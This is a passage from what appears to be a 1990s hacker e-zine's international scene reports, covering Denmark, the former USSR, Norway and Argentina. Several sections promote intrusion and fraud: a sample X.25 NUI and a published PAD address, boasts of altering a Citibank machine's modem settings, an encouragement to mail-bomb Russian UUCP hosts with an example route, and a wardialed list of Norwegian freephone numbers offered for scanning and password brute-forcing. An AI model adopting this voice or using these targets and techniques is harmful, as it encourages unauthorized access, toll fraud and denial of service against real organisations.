  20741. 'modem security password' on all dialups. So when you call up the system,
  20742. before you ever get to the server you have to enter a password. And if you get
  20743. through, not all accounts are cleared to use the modem dialup facilities,
  20744. and unless you've got your sleazy hands on a cleared account, you get the boot.
  20745.  
  20746. Even though the universities puts such a great effort into keeping
  20747. hackers out, they aren't doing very good. In fact, they are doing real
  20748. bad. A legit account costs appr. 1900 dkr, which is about a little over
  20749. 300$ US., which goes into the pockets of UNI*C, so its no wonder that
  20750. we like to use the nice free facilities present at the universities.
  20751.  
  20752. Other ways to get on Internet, are via other machines under the ministry
  20753. of education and certain private and government systems. It's surprising
  20754. how many bugs (that we all know of) in certain UNIX versions, that still
  20755. have not been patched, and therefore leave the systems wide open.
  20756. This goes not only for Denmark, but generally throughout machines on Internet
  20757. in Europe. Also, a well known phenomena in DK throughout the sector of
  20758. private corporation computer systems, is lousy security. Elementary
  20759. stuff like bad file permissions, left over suid shell scripts, and
  20760. open guest accounts are everywhere.
  20761.  
  20762. Regarding the X25 datapak links. The official Danish PAD can be
  20763. reached at dialup 171. This is totally free number just like 80xxxxxx
  20764. are, which doesn't affect your phone bill. Keep in mind that all calls made in
  20765. DK are billed, even local calls within same city are charged, and charged
  20766. high! I remember a time when I was kind of addicted to a certain MUD. For one
  20767. month alone I got a bill on 1800 dkr, appr. 300 US$! So, the 171 X25 link is
  20768. nice thing, since all calls are billed to the owner of the Network User Id
  20769. (NUI) and NOT on your phone bill.
  20770.  
  20771. However, X25 can be a dangerous thing to use. Especially if you only
  20772. have a single NUI to use. The phone company is having some trouble tracing
  20773. the 171, but all calls made in DK on digital lines are logged. So, when
  20774. some corporation gets a bill on, say 2-3000$ or an amount much higher
  20775. than usual, the phone company can compare the logs on who dialed 171,
  20776. to the X25 logs, on which date and time the NUI in question was abused,
  20777. and figure out who abused the NUI. On analog lines the logging is
  20778. harder to do, and only goes back a month or so. The format of the NUIs
  20779. consist of a user number and a password. The first char indicates
  20780. either a K or J, depending on the NUI's owner, either located under KTAS
  20781. or JTAS districts. Jutland is covered by JTAS and Copenhagen Sjlland,
  20782. by KTAS. Then follows 7 or 8 numbers and usually a word of 7-8 chars. Like,
  20783. K0100872DKDIANEC, this is a valid NUI open for public use by everybody,
  20784. but its restricted to only to connect to a specific system. Sum lame
  20785. menu database thing. Most NUI's allows access to most computers, world
  20786. wide on the X25 network, by an NUA (network User Address). The most use
  20787. of X25 is to gain free access to Internet by connecting to a PAD which
  20788. allows telnet. Most of the telnet PAD's has been closed recently because
  20789. of an increasing (ab)use. However, there is still sites like isosun-t.
  20790. ariadne.gr which carries an X25 PAD, and because the sysadm there comes off
  20791. like a dick and is a jerk I'll give u all his NUA. Its 020233181282010. Also,
  20792. check out gw.sdbs.dk, carries a 9k6 x25 link as well as normal Inet axx.
  20793.  
  20794.  
  20795. A few people to mention, who either has or is playing an important
  20796. part of the Danish hacking community:
  20797.  
  20798. JubJub Bird, Sprocket, Saron, Ravan, Netrunner / Sense/NET, Descore, WedLock,
  20799. Le Cerveau, Parrot-Ice, Jackal, Temp, Therion, and myself I guess... :)
  20800.  
  20801. If u like, check out:
  20802.  
  20803. Free Speech Inc. (+45) 4 582 5565  SysOp: NiteCrawler
  20804. Freeside         (+45) 3 122 3119   -"- : Descore  (Off. CJ Dist. site.)
  20805.  
  20806. This is it. Hope u enjoyed this little file. We are always happy to
  20807. meet foreign hackers, so call one of the above boards and lets exchange
  20808. accou.. ehh... intercultural hacking research information :)
  20809.  
  20810. -----------------------------------------------------------------------------
  20811.  
  20812.  
  20813.                Why would you or why wouldn't you want
  20814.               to hack in the ex-USSR or in other words
  20815.                   what the hell do we do up here.
  20816.  
  20817.                 By Digital Empiror and Stupid Fucker
  20818.  
  20819. Russia is a great country, with absolutely no laws against hacking or
  20820. phreaking, both are very easy to do and get away with. It's for that
  20821. reason, that most of the famous online services like CompuServe and Delphi
  20822. closed registrations coming out of the biggest country in the world via
  20823. SprintNet, (you guys think we still can't get in? ... take that as a hint).
  20824. If some great telephone company installed a payphone that can charge calls
  20825. onto a credit card (very rare in this country) then we can use it as well,
  20826. credit card numbers are not hard to compile, especially if you know that
  20827. it is not really illegal. What about those great cellular telephones, you
  20828. know, we love to use those for free, (can't you guys get it? we know that
  20829. we are pain in the ass, but LIVE WITH IT!).
  20830.  
  20831. Most of our switchboards in Russia are very ancient, screwed up
  20832. relay-analog switches, they don't have methods for protocol-ing
  20833. telephone calls and present undependable methods for identifying telephone
  20834. numbers. Also there is special equipment which allows making it impossible
  20835. to detect your phone number, or even making detection equipment mistake your
  20836. phone number. Interstate switchboards have to have special methods of
  20837. detecting your phone number, which are of course only accessible to
  20838. Interstate switchboards and not to the rest of commercial companies. There
  20839. was a case once were SprintNet caught one of our great hackers, but he had
  20840. sent them to his great grandfather's (wanna try doing that with the
  20841. FBI?) because as he said 'You can't really be sure that it was really ME
  20842. calling since in this country you can't rely on your number detection
  20843. equipment...'
  20844.  
  20845. Another great thing is how the networks are set up in Russia. The greatest
  20846. and the biggest X.25 network is of course SprintNet (for which they have to
  20847. pay of course, if not them then somebody else...), it's a little slow here,
  20848. but that's OK. The administrators who set up the PADs are very lame and
  20849. stupid, and of course can't set up their PADs like SprintNet would want
  20850. them to. They can, for example, they were setting up their PAD so, that it
  20851. would let you connect with virtually ANY system without asking for a NUI,
  20852. and even when they detected, that hackers do it, they couldn't do anything
  20853. besides changing their PAD instead of just changing one register!
  20854.  
  20855. Besides that, their is no problem with finding a NUI for Russian X.25
  20856. networks, most of them don't support collect calls like SprintNet, so most
  20857. Russian services that would like their customers to access their service
  20858. via X.25 give the users a unique NUI, that specifies that they can only
  20859. access THIS service, but they usually forget to set it up right so the
  20860. stupid customers like another of our great hackers, will instead of getting
  20861. charged for the service, go to an outdial and call his favorite BBS in
  20862. Clearwater, FL for an example (do they have boards there?).  I don't know
  20863. if you like to access CitiBank machines from SprintNet, but we love to do
  20864. stuff like that.  For example, recently we found a lone standing computer,
  20865. I don't think the guys in CitiBank really understood what they were doing
  20866. when they left their modem setup option on that machine without a password,
  20867. it was a pleasure to change their modem strings knowing that it's absolutely
  20868. legal to do so and nobody has even a right to call about it!  Also there
  20869. are Internet providers in Russia, only two, from which only one is
  20870. interesting - RELCOM!  Most of Internet in Russia is done via UUCP and
  20871. costs a bundle of money, so if I am in a bad mood, I'll drop 10-20 megs of
  20872. mail into an address that doesn't exist, and will laugh and you know why?
  20873. In RELCOM, everybody pays the central router - KIAE.SU, so if you send megs
  20874. of stuff, it will go through a lot of systems that will have to pay first
  20875. each other then to KIAE.SU, but there will be THE last system, that will
  20876. say 'ya know? there is no such address!', so then the trouble will start.
  20877. So if you are in a bad mood, then please, do us a favor, drop a gig or 2 to
  20878. machine that does not have an IP address, better for it to go via a few of
  20879. those machines, for example, to be original:
  20880.  
  20881. kaija.spb.su!arcom.spb.su!<any machine in USA>!kiae.su!kaija.spb.su!root
  20882.  
  20883. I am sure if you have NSLOOKUP, you can be original and make your best
  20884. route via a dozen systems. When doing it, you can be sure, that it will
  20885. call a lot of arguments from every one of that dozen concerning to who will
  20886. pay for that gig (1mb of mail in Russia costs $50 - $150, that enough money
  20887. for poor Russian Internet hosts).
  20888.  
  20889. It's all really great, but we are all on our own, and are not organized into a
  20890. group.  There are not many of us and we are not known by any of our western
  20891. colleagues, to contact us, mail us at:
  20892.  
  20893.         an58736@anon.penet.fi
  20894.  
  20895. -----------------------------------------------------------------------------
  20896.                         PhreeFone Numbers in Norway
  20897.                      Research and Norwegian Edition by
  20898.  
  20899.                           cyber aktiF (01-Feb-94)
  20900.  
  20901.                English Translation by Codex/DBA (26-Apr-1994)
  20902. -----------------------------------------------------------------------------
  20903.  
  20904. DISCLAIMER: The author of this document takes no responsibility as to how
  20905.             the information herein is used. I hope everyone who uses this
  20906.             information use it for inquisitive purposes only, and don't
  20907.             use it for ANY destructive purposes whatsoever.
  20908.  
  20909. WARNING:    Unauthorized use of PBX and other communications equipment
  20910.             owned by others, be it private or business, is illegal and may
  20911.             result in banishment from the Norwegian telephone company (Tele-
  20912.             verket) and/or punishment by law.
  20913.  
  20914.                                      ---
  20915.  
  20916. After many sporadic travels over the phone network, in other words scanning
  20917. the number region 800 3xxxx, I've come across several interesting things. I
  20918. therefore thought it was in its right place to make a complete list of which
  20919. numbers have a carrier and which have not. The carriers only apply to modems.
  20920. Televerket has (currently) allocated the region 800 30000 to 800 3500 for
  20921. these services.
  20922.  
  20923. These lines are 100% phreefone, which means that the owner of these services
  20924. pays for the conversation plus a surcharge per unit. This allows for long
  20925. permutations of numbers and passwords without adding to your own phone bill.
  20926. On the other hand, the owner of the line will have a phonebill which equals
  20927. American Express's.
  20928.  
  20929. Televerket and/or the company/person supplying the service(s) have NO problem
  20930. finding out what the caller's number is. This is regardless whether or not
  20931. you have filled in the "don't reveal my number to those I call" part of
  20932. Televerket's connection form/document. Therefore, nosing around these numbers
  20933. should be done with some care.
  20934.  
  20935. I haven't tried blueboxing 800 numbers (too much work for something which is
  20936. free in the first place), but theoretically it is possible. [Codex: Would
  20937. this lessen the number identification risk?]
  20938.  
  20939. I had severe difficulties with a number which answered with an 1800Hz tone
  20940. in 1 second, after which it became silent. This box phoned me in intervals
  20941. of 5 minutes from 12:00 the next day -- in other words, an automatic
  20942. WarDial :/. If you discover the same problem, the following solution is
  20943. a guaranteed success: Program your local trunk to send all incoming calls
  20944. to ANOTHER number which answers with an 1800Hz tone. Let this be active an
  20945. hour's time, and you should be rid of it.
  20946.  
  20947.                                  - MODEM -
  20948.  
  20949. The list of numbers where modem carriers are commented with a single line. I
  20950. haven't (at the time of writing) done a deeper investigation of any of the
  20951. services, so none of them should be inactive.
  20952.  
  20953. There are several interesting things -- especially the gateways and the
  20954. X.25 PAD. Please note that the security at most of the systems are pretty
  20955. good. Obscure terminal types, data locks and systems which won't identify
  20956. themselves are the most common types. Someone has done a good job in making
  20957. the system safe from unauthorized sources. However, as said before,
  20958. phreefone numbers can be exposed to attacks and permutations of zimmering
  20959. quantities.
  20960.  
  20961. When I had a look at the unidentified services, the best way to connect was
  20962. using a raw-mode tty which won't accept special characters. If you run a
  20963. cooked-mode terminal, the text will become even more unreadable.
  20964.  
  20965. -- Modem carrier tones ------------------------------------------------------
  20966.  
  20967. 80030004 - Data Lock (1)
  20968. 80030010 - *no output*
  20969. 80030067 - *no output*
  20970. 80030068 - Courier ASCII Dev. adapter
  20971. 80030078 - Courier ASCII Dev. adapter
  20972. 80030095 - Modem Outdial (password)
  20973. 80030115 - *no output*
  20974. 80030130 - *uknown*
  20975. 80030180 - *uknown*
  20976. 80030225 - *no output*
  20977. 80030301 - *no output*
  20978. 80030404 - *unknown* - prompts @ter
  20979. 80030456 - *unknown* - terminal
  20980. 80030485 - *unknown*
  20981. 80030456 - Data Lock 4000 (1)
  20982. 80030514 - garbage - password
  20983. 80030606 - *no output*
  20984. 80031040 - *no output*
  20985. 80031065 - *no output*
  20986. 80031315 - IBM Aix v3 RISC system/6000 (2)
  20987. 80031470 - garbage
  20988. 80031490 - Dr V.Furst. Med. Lab
  20989. 80031666 - prompts - @ter
  20990. 80031815 - prompts - <
  20991. 80031920 - *unknown* - password
  20992. 80031950 - *unknown* - hangup after 5 seconds
  20993. 80032165 - Dr V.Furst. Med. Lab
  20994. 80032340 - *uknown*
  20995. 80032410 - Wangvs VAX/VMS
  20996. 80032470 - *no output*
  20997. 80032480 - Perle Model 3i - V 02.00G - Apotekernes F. Innkj
  20998. 80032590 - *unknown* - password
  20999. 80032635 - *unknown* - terminal
  21000. 80033338 - TSS Gateway (3)
  21001. 80033443 - *no output*
  21002. 80033490 - *no output*
  21003. 80033580 - *unknown* - hangup after 5 seconds
  21004. 80033601 - *no output*
  21005. 80033620 - TIU Gateway (3)
  21006. 80033720 - *no output*
  21007. 80033815 - *unknown* - hangup after 5 seconds
  21008. 80033914 - *unknown* dumps lots of texts [Codex: What type?]
  21009. 80034248 - *unknown* - prompts for login
  21010. 80034866 - X.25 PAD
  21011.  
  21012. (1) DATA LOCK
  21013.     If someone can get into one of these, he/she can look forward to getting
  21014.     a Nobel prize. Data locks are modem front-end protectors, almost
  21015.     impossible to crack without physical access.
  21016.  
  21017. (2) IBM AIX
  21018.     AIX is one of the best flavors of UNIX there is (even though it was
  21019.     made by IBM) -- unfortunately the security at this site was so terrible
  21020.     that anyone with a minimal knowledge of UNIX and access to this machine
  21021.     could pull it apart blindfolded (making the life really unpleasant for
  21022.     the estate agents who own the LAN. Write me for an account ;).
  21023.  
  21024. (3) GATEWAYS
  21025.     Free internet access within grasping distance if you can break through.
  21026.     Not easy, but possible. ;) I am already working on it, so I'm not sure
  21027.     how long it will take until they increase the security.
  21028.  
  21029. [Codex: Comment about Study-By-Byte removed, as I didn't know what to call
  21030. the school in English ;). Another fact was that since no number was provided,
  21031. and little seemed to be gained by access to this site anyway, I figured it
  21032. wasn't too important. Get hold of cyb3rF is you really think it's needed.]
  21033.  
  21034. -- End of modem carrier listing ---------------------------------------------
  21035.  
  21036.                               - VOICE/PBX/FAX -
  21037.  
  21038. Here, ladies and gentlemen, is the list of all the phones in the 800 3xxxx
  21039. region which answer. Which is what, I'll leave up all you people out there.
  21040. I have mapped some of the list, but won't spread it [Codex: Yet? ;)].
  21041.  
  21042. Only one number per line is noted down. This is to easy the job for everyone
  21043. who's going to (and you will try ;) run these numbers through their scanner
  21044. scripts on the lookout for PBX's and other oddities.
  21045.  
  21046. Good luck guys!
  21047.  
  21048. cyber aktiF - 01/02/94
  21049.  
  21050. -- Answering 800 3xxxx services ---------------------------------------------
  21051.  
  21052. 80030000
  21053. 80030001
  21054. 80030002
  21055. 80030003
  21056. 80030005
  21057. 80030006
  21058. 80030007
  21059. 80030008
  21060. 80030009
  21061. 80030011
  21062. 80030012
  21063. 80030014
  21064. 80030015
  21065. 80030016
  21066. 80030017
  21067. 80030018
  21068. 80030019
  21069. 80030022
  21070. 80030023
  21071. 80030024
  21072. 80030025
  21073. 80030027
  21074. 80030028
  21075. 80030029
  21076. 80030030
  21077. 80030032
  21078. 80030033
  21079. 80030035
  21080. 80030036
  21081. 80030037
  21082. 80030043
  21083. 80030044
  21084. 80030045
  21085. 80030046
  21086. 80030048
  21087. 80030050
  21088. 80030051
  21089. 80030053
  21090. 80030055
  21091. 80030057
  21092. 80030058
  21093. 80030060
  21094. 80030065
  21095. 80030066
  21096. 80030070
  21097. 80030071
  21098. 80030072
  21099. 80030073
  21100. 80030074
  21101. 80030075
  21102. 80030077
  21103. 80030080
  21104. 80030082
  21105. 80030088
  21106. 80030094
  21107. 80030096
  21108. 80030097
  21109. 80030098
  21110. 80030099
  21111. 80030100
  21112. 80030101
  21113. 80030102
  21114. 80030103
  21115. 80030105
  21116. 80030106
  21117. 80030110
  21118. 80030111
  21119. 80030113
  21120. 80030114
  21121. 80030116
  21122. 80030120
  21123. 80030131
  21124. 80030136
  21125. 80030140
  21126. 80030144
  21127. 80030151
  21128. 80030155
  21129. 80030160
  21130. 80030166
  21131. 80030170
  21132. 80030171
  21133. 80030175
  21134. 80030177
  21135. 80030189
  21136. 80030190
  21137. 80030195
  21138. 80030199
  21139. 80030200
  21140. 80030202
  21141. 80030203
  21142. 80030205
  21143. 80030210
  21144. 80030211
  21145. 80030212
  21146. 80030213
  21147. 80030215
  21148. 80030222
  21149. 80030227
  21150. 80030230
  21151. 80030233
  21152. 80030235
  21153. 80030239
  21154. 80030250
  21155. 80030255
  21156. 80030258
  21157. 80030260
  21158. 80030265
  21159. 80030270
  21160. 80030275
  21161. 80030277
  21162. 80030288
  21163. 80030290
  21164. 80030294
  21165. 80030295
  21166. 80030297
  21167. 80030299
  21168. 80030300
  21169. 80030302
  21170. 80030303
  21171. 80030305
  21172. 80030306
  21173. 80030308
  21174. 80030310
  21175. 80030311
  21176. 80030313
  21177. 80030315
  21178. 80030318
  21179. 80030319
  21180. 80030322
  21181. 80030323
  21182. 80030330
  21183. 80030333
  21184. 80030336
  21185. 80030337
  21186. 80030340
  21187. 80030344
  21188. 80030345
  21189. 80030355
  21190. 80030360
  21191. 80030363
  21192. 80030366
  21193. 80030377
  21194. 80030380
  21195. 80030388
  21196. 80030390
  21197. 80030395
  21198. 80030400
  21199. 80030401
  21200. 80030407
  21201. 80030408
  21202. 80030411
  21203. 80030415
  21204. 80030420
  21205. 80030422
  21206. 80030433
  21207. 80030440
  21208. 80030445
  21209. 80030450
  21210. 80030452
  21211. 80030466
  21212. 80030470
  21213. 80030472
  21214. 80030475
  21215. 80030480
  21216. 80030488
  21217. 80030490
  21218. 80030495
  21219. 80030500
  21220. 80030501
  21221. 80030502
  21222. 80030511
  21223. 80030520
  21224. 80030522
  21225. 80030531
  21226. 80030540
  21227. 80030545
  21228. 80030550
  21229. 80030555
  21230. 80030560
  21231. 80030565
  21232. 80030566
  21233. 80030570
  21234. 80030571
  21235. 80030580
  21236. 80030585
  21237. 80030600
  21238. 80030601
  21239. 80030603
  21240. 80030600
  21241. 80030601
  21242. 80030603
  21243. 80030610
  21244. 80030616
  21245. 88030640
  21246. 80030650
  21247. 80030666
  21248. 80030670
  21249. 80030680
  21250. 80030683
  21251. 80030690
  21252. 80030700
  21253. 80030701
  21254. 80030707
  21255. 80030725
  21256. 80030730
  21257. 80030750
  21258. 80030770
  21259. 80030777
  21260. 80030788
  21261. 80030800
  21262. 80030803
  21263. 80030811
  21264. 80030828
  21265. 80030830
  21266. 80030840
  21267. 80030844
  21268. 80030850
  21269. 80030855
  21270. 80030860
  21271. 80030866
  21272. 80030870
  21273. 80030875
  21274. 80030880
  21275. 80030888
  21276. 80030889
  21277. 80030890
  21278. 80030900
  21279. 80030906
  21280. 80030910
  21281. 80030911
  21282. 80030915
  21283. 80030920
  21284. 80030922
  21285. 80030930
  21286. 80030940
  21287. 80030950
  21288. 80030955
  21289. 80030959
  21290. 80030960
  21291. 80030975
  21292. 80030990
  21293. 80030994
  21294. 80031000
  21295. 80031001
  21296. 80031006
  21297. 80031007
  21298. 80031008
  21299. 80031010
  21300. 80031020
  21301. 80031030
  21302. 80031031
  21303. 80031043
  21304. 80031044
  21305. 80031048
  21306. 80031055
  21307. 80031058
  21308. 80031060
  21309. 80031064
  21310. 80031066
  21311. 80031070
  21312. 80031075
  21313. 80031080
  21314. 80031082
  21315. 80031085
  21316. 80031092
  21317. 80031097
  21318. 80031103
  21319. 80031108
  21320. 80031110
  21321. 80031111
  21322. 80031112
  21323. 80031113
  21324. 80031122
  21325. 80031123
  21326. 80031140
  21327. 80031144
  21328. 80031150
  21329. 80031151
  21330. 80031155
  21331. 80031160
  21332. 80031166
  21333. 80031180
  21334. 80031188
  21335. 80031200
  21336. 80031210
  21337. 80031211
  21338. 80031212
  21339. 80031220
  21340. 80031221
  21341. 80031229
  21342. 80031230
  21343. 80031231
  21344. 80031234
  21345. 80031240
  21346. 80031241
  21347. 80031244
  21348. 80031250
  21349. 80031255
  21350. 80031266
  21351. 80031288
  21352. 80031290
  21353. 80031300
  21354. 80031306
  21355. 80031310
  21356. 80031313
  21357. 80031318
  21358. 80031336
  21359. 80031340
  21360. 80031343
  21361. 80031344
  21362. 80031355
  21363. 80031360
  21364. 80031366
  21365. 80031400
  21366. 80031404
  21367. 80031410
  21368. 80031412
  21369. 80031420
  21370. 80031422
  21371. 80031430
  21372. 80031440
  21373. 80031441
  21374. 80031447
  21375. 80031455
  21376. 80031460
  21377. 80031466
  21378. 80031510
  21379. 80031535
  21380. 80031540
  21381. 80031545
  21382. 80031550
  21383. 80031560
  21384. 80031566
  21385. 80031570
  21386. 80031571
  21387. 80031580
  21388. 80031590
  21389. 80031600
  21390. 80031606
  21391. 80031610
  21392. 80031611
  21393. 80031620
  21394. 80031630
  21395. 80031631
  21396. 80031640
  21397. 80031660
  21398. 80031661
  21399. 80031680
  21400. 80031688
  21401. 80031690
  21402. 80031700
  21403. 80031701
  21404. 80031707
  21405. 80031713
  21406. 80031717
  21407. 80031740
  21408. 80031760
  21409. 80031777
  21410. 80031780
  21411. 80031800
  21412. 80031801
  21413. 80031809
  21414. 80031811
  21415. 80031820
  21416. 80031830
  21417. 80031831
  21418. 80031833
  21419. 80031840
  21420. 80031850
  21421. 80031851
  21422. 80031866
  21423. 80031880
  21424. 80031888
  21425. 80031900
  21426. 80031907
  21427. 80031919
  21428. 80031927
  21429. 80031937
  21430. 80031947
  21431. 80031957
  21432. 80031958
  21433. 80031959
  21434. 80031970
  21435. 80031994
  21436. 80031995
  21437. 80031999
  21438. 80032000
  21439. 80032001
  21440. 80032002
  21441. 80032005
  21442. 80032008
  21443. 80032011
  21444. 80032020
  21445. 80032032
  21446. 80032040
  21447. 80032062
  21448. 80032066
  21449. 80032080
  21450. 80032092
  21451. 80032101
  21452. 80032105
  21453. 80032113
  21454. 80032123
  21455. 80032130
  21456. 80032140
  21457. 80032144
  21458. 80032150
  21459. 80032152
  21460. 80032155
  21461. 80032166
  21462. 80032173
  21463. 80032176
  21464. 80032200
  21465. 80032202
  21466. 80032210
  21467. 80032212
  21468. 80032220
  21469. 80032222
  21470. 80032223
  21471. 80032225
  21472. 80032232
  21473. 80032255
  21474. 80032280
  21475. 80032320
  21476. 80032323
  21477. 80032325
  21478. 80032330
  21479. 80032332
  21480. 80032333
  21481. 80032350
  21482. 80032355
  21483. 80032383
  21484. 80032390
  21485. 80032399
  21486. 80032400
  21487. 80032412
  21488. 80032415
  21489. 80032420
  21490. 80032424
  21491. 80032425
  21492. 80032432
  21493. 80032444
  21494. 80032450
  21495. 80032455
  21496. 80032460
  21497. 80032466
  21498. 80032500
  21499. 80032511
  21500. 80032520
  21501. 80032525
  21502. 80032530
  21503. 80032540
  21504. 80032550
  21505. 80032555
  21506. 80032560
  21507. 80032565
  21508. 80032571
  21509. 80032578
  21510. 80032600
  21511. 80032639
  21512. 80032660
  21513. 80032666
  21514. 80032668
  21515. 80032680
  21516. 80032690
  21517. 80032750
  21518. 80032754
  21519. 80032808
  21520. 80032820
  21521. 80032832
  21522. 80032850
  21523. 80032875
  21524. 80032880
  21525. 80032899
  21526. 80032900
  21527. 80032907
  21528. 80032927
  21529. 80032987
  21530. 80032990
  21531. 80032997
  21532. 80033000
  21533. 80033003
  21534. 80033011
  21535. 80033013
  21536. 80033016
  21537. 80033300
  21538. 80033301
  21539. 80033302
  21540. 80033303
  21541. 80033304
  21542. 80033305
  21543. 80033306
  21544. 80033310
  21545. 80033311
  21546. 80033312
  21547. 80033313
  21548. 80033315
  21549. 80033317
  21550. 80033318
  21551. 80033320
  21552. 80033321
  21553. 80033322
  21554. 80033325
  21555. 80033330
  21556. 80033331
  21557. 80033332
  21558. 80033333
  21559. 80033334
  21560. 80033335
  21561. 80033341
  21562. 80033345
  21563. 80033350
  21564. 80033353
  21565. 80033355
  21566. 80033370
  21567. 80033372
  21568. 80033373
  21569. 80033377
  21570. 80033380
  21571. 80033383
  21572. 80033385
  21573. 80033394
  21574. 80033399
  21575. 80033410
  21576. 80033411
  21577. 80033420
  21578. 80033432
  21579. 80033433
  21580. 80033440
  21581. 80033444
  21582. 80033445
  21583. 80033448
  21584. 80033450
  21585. 80033455
  21586. 80033456
  21587. 80033460
  21588. 80033466
  21589. 80033477
  21590. 80033488
  21591. 80033499
  21592. 80033500
  21593. 80033505
  21594. 80033510
  21595. 80033515
  21596. 80033520
  21597. 80033535
  21598. 80033540
  21599. 80033550
  21600. 80033555
  21601. 80033566
  21602. 80033567
  21603. 80033570
  21604. 80033577
  21605. 80033585
  21606. 80033590
  21607. 80033600
  21608. 80033610
  21609. 80033611
  21610. 80033616
  21611. 80033622
  21612. 80033626
  21613. 80033630
  21614. 80033633
  21615. 80033644
  21616. 80033650
  21617. 80033655
  21618. 80033660
  21619. 80033666
  21620. 80033670
  21621. 80033678
  21622. 80033690
  21623. 80033711
  21624. 80033717
  21625. 80033730
  21626. 80033733
  21627. 80033740
  21628. 80033760
  21629. 80033770
  21630. 80033775
  21631. 80033777
  21632. 80033779
  21633. 80033780
  21634. 80033788
  21635. 80033800
  21636. 80033808
  21637. 80033810
  21638. 80033818
  21639. 80033820
  21640. 80033833
  21641. 80033838
  21642. 80033840
  21643. 80033844
  21644. 80033855
  21645. 80033856
  21646. 80033860
  21647. 80033866
  21648. 80033880
  21649. 80033888
  21650. 80033890
  21651. 80033899
  21652. 80033900
  21653. 80033920
  21654. 80033930
  21655. 80033933
  21656. 80033940
  21657. 80033950
  21658. 80033960
  21659. 80033970
  21660. 80033977
  21661. 80033980
  21662. 80033990
  21663. 80033994
  21664. 80033999
  21665. 80034000
  21666. 80034011
  21667. 80034020
  21668. 80034022
  21669. 80034024
  21670. 80034025
  21671. 80034030
  21672. 80034033
  21673. 80034034
  21674. 80034035
  21675. 80034040
  21676. 80034043
  21677. 80034044
  21678. 80034050
  21679. 80034055
  21680. 80034070
  21681. 80034077
  21682. 80034080
  21683. 80034088
  21684. 80034090
  21685. 80034100
  21686. 80034110
  21687. 80034111
  21688. 80034115
  21689. 80034123
  21690. 80034125
  21691. 80034134
  21692. 80034135
  21693. 80034140
  21694. 80034144
  21695. 80034150
  21696. 80034155
  21697. 80034160
  21698. 80034166
  21699. 80034170
  21700. 80034180
  21701. 80034210
  21702. 80034220
  21703. 80034222
  21704. 80034240
  21705. 80034250
  21706. 80034260
  21707. 80034266
  21708. 80034270
  21709. 80034880
  21710. 80034888
  21711. 80034889
  21712. 80034910
  21713. 80034966
  21714. 80034988
  21715. 80034999
  21716. 80035000
  21717.  
  21718. -- End of list of answering 800 3xxxx services ------------------------------
  21719.  
  21720. This file was brought to you in English by Codex/DBA, 26-Apr-1994. I didn't
  21721. ask cyb3rF for permission to translate this document, but I hope he won't
  21722. mind. I also understand that the document is of varied use to some people
  21723. (those of you who can't dial in free to Norway (cc 47), don't bother), but I
  21724. thought any information, however useful might be of some interrest to the
  21725. English speaking crowd out there.
  21726.  
  21727. Re: cyb3rF, Sicko, BattleAng, Maelstrom, Uridium, Enigma, Golan, BadS, vale_
  21728.     and any other people I've forgotten to mention right now (flame me on
  21729.     #phreak, guys ;).
  21730.  
  21731. I'll be back in Norway in June.
  21732.  
  21733.                                                       Codex/DBA, 26-Apr-1994.
  21734. -- "Men I haelvete gutar, vaent paa meg!!" ----------------------------------
  21735.  
  21736. -----------------------------------------------------------------------------
  21737.  
  21738. More about the Argentine Internet scenery.
  21739.  
  21740.  
  21741. It's difficult to add something to an already good article like Opii's one,
  21742. but here is some info which may interest you besides what you already know:
  21743.  
  21744. * The local Net started as late as January 1989, when the National Commission
  21745. for Atomic Power (CNEA) connected to the BITNET network. The three first
  21746. nodes were: ARGCNE (an IBM 9370-60 mainframe), ARGCNEA1 (IBM/370 158),
  21747. and ARGCNEA2 (Comparex 7/68), all running RSCS V1. Release3 for data comm.
  21748.  
  21749. The node ARGCNEA2 was (I think it still is) the main link in Argentina to
  21750. Bitnet. Until late 1992, they still used a manual DIAL-UP LINK (!) to the
  21751. Chilean node UCHCECVM (IBM 4341MO2) at the Chile's National University in
  21752. Santiago city, connecting at 9600 bps to exchange mail. I'm not sure about
  21753. if the Chilean link is still working, due to the existing new leased line
  21754. connection of the government's foreign office.
  21755.  
  21756. In mid-1990, the national university of La Plata, joined ranks and also
  21757. connected to the Bitnet network. The two nodes, CESPIVM1 and CESPIVM2
  21758. (Running on IBM mainframes) also served as hosts to a VAX 11-780, and a
  21759. experimental link to some computers in Uruguay's (country) national
  21760. University.
  21761.  
  21762. Another different beast is what's called the RAN network (National Academic
  21763. Network), which is nothing more than a UUCP network connecting a hundred
  21764. different nodes through the country. Again, until mid-92 they used X.25
  21765. ARPAC connections (!!EXPENSIVE!!) and manual Dial-up calls(!!) for the
  21766. "international" connection into UUCO. More recently (two months ago), they
  21767. have got their own 64kbps leased line to the US, which finally will let
  21768. people around the world to mess and GET into our computers :-).
  21769.  
  21770. While the project was to connect to Maryland University (financed by the
  21771. US National Science Foundation, they love us), I still don't know what's the
  21772. host at the other side of the leased line.
  21773.  
  21774. Well, that's the end of the FACTS that I have... now some political opinions:
  21775. Things are getting a *little* better, but I don't expect any improvements
  21776. for "Joe average" user, since to make things work, we must get rid off the
  21777. current LD and data monopoly of the two European private telcos that own us.
  21778. Until 1999, they have the exclusive right to use and abuse the market of
  21779. both voice and data transmissions, and no competition can enter without
  21780. passing through their satellite links (and rates). Very nice for a government
  21781. that is always speaking of "free markets".
  21782.  
  21783. Until we get AT&T and/or MCI competing for the market, we won't have affordable
  21784. rates, and US companies like CIS, Delphi, etc. than could be doing BIG
  21785. business NOW, will have to wait until late 1999, when the monopoly ends by
  21786. law. (Or, BTW: or they can talk to Mr. Al Gore, so he can kick a little our
  21787. beloved president to end the telcos ripoff).
  21788.  
  21789. Chileans, in contrast, have a lot better scene, with well-established direct
  21790. internet links, an X.25 network with 9600bps access through the country, and
  21791. even Gopher servers since a long time ago!.
  21792.  
  21793. Following is a quick and dirty list of Internet domains for both Chile and
  21794. Argentina:
  21795.  
  21796. ARGENTINA:
  21797.  
  21798. ar.ar (unspecified)
  21799. athea.ar (unspecified)
  21800. atina.ar (united nations development programme, argentina) (RAN UUCP HOST)
  21801. ba.ar (unspecified)
  21802. cb.ar (unspecified)
  21803. com.ar (unspecified)
  21804. edu.ar (unspecified)
  21805. gov.ar (government of argentina)   <- give my regards to our corrupt gvt!
  21806. mz.ar (unspecified)
  21807. ncr.ar (national cash register corporation, argentina)
  21808. nq.ar (unspecified)
  21809. org.ar (centro de estudios de poblacion corrientes',)
  21810. sld.ar (unspecified)
  21811. subdomain.ar (unspecified)
  21812. test.ar (unspecified)
  21813. tf.ar (unspecified)
  21814. tm.ar (unspecified)
  21815. buenosaires.ncr.ar (national cash register corporation, buenos aires, arg)
  21816. city.ar.us (unspecified)
